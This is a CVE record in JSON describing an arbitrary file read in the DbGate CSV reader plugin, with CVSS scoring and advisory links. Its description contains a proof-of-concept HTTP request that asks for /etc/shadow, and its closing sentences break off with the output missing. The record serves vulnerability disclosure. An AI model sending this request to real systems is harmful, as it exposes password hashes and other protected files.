CVE-2025-50185

{"id": "CVE-2025-50185", "cveTags": [], "metrics": {"cvssMetricV40": [{"type": "Secondary", "source": "security-advisories@github.com", "cvssData": {"Safety": "NOT_DEFINED", "version": "4.0", "Recovery": "NOT_DEFINED", "baseScore": 7.0, "Automatable": "NOT_DEFINED", "attackVector": "NETWORK", "baseSeverity": "HIGH", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "exploitMaturity": "PROOF_OF_CONCEPT", "providerUrgency": "NOT_DEFINED", "userInteraction": "NONE", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "subIntegrityImpact": "NONE", "vulnIntegrityImpact": "NONE", "integrityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "availabilityRequirement": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "subConfidentialityImpact": "HIGH", "vulnConfidentialityImpact": "HIGH", "confidentialityRequirement": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED"}}]}, "published": "2025-07-26T04:16:04.207", "references": [{"url": "https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102", "source": "security-advisories@github.com"}, {"url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9", "source": "security-advisories@github.com"}], "vulnStatus": "Received", "weaknesses": [{"type": "Primary", "source": "security-advisories@github.com", "description": [{"lang": "en", "value": "CWE-29"}]}], "descriptions": [{"lang": "en", "value": "DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue.\n\n\n\n\n\n\n```\nPOST /runners/load-reader HTTP/1.1\nHost: <REPLACE ME>\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: <REPLACE ME>\nContent-Type: application/json\nAuthorization: Bearer <REPLACE ME>\nContent-Length: 127\nOrigin: http://192.168.124.119:3000\nConnection: keep-alive\nCookie: <REPLACE ME>\nPriority: u=0\nCache-Control: max-age=0\n\n{\"functionName\":\"reader@dbgate-plugin-csv\",\"props\":{\"fileName\":\"/etc\\/shadow\",\"limitRows\":100}}\n\n```\n\n\n\nThe request payload:\n\n\n\nLines of the file being returned:\n"}], "lastModified": "2025-07-26T04:16:04.207", "sourceIdentifier": "security-advisories@github.com"}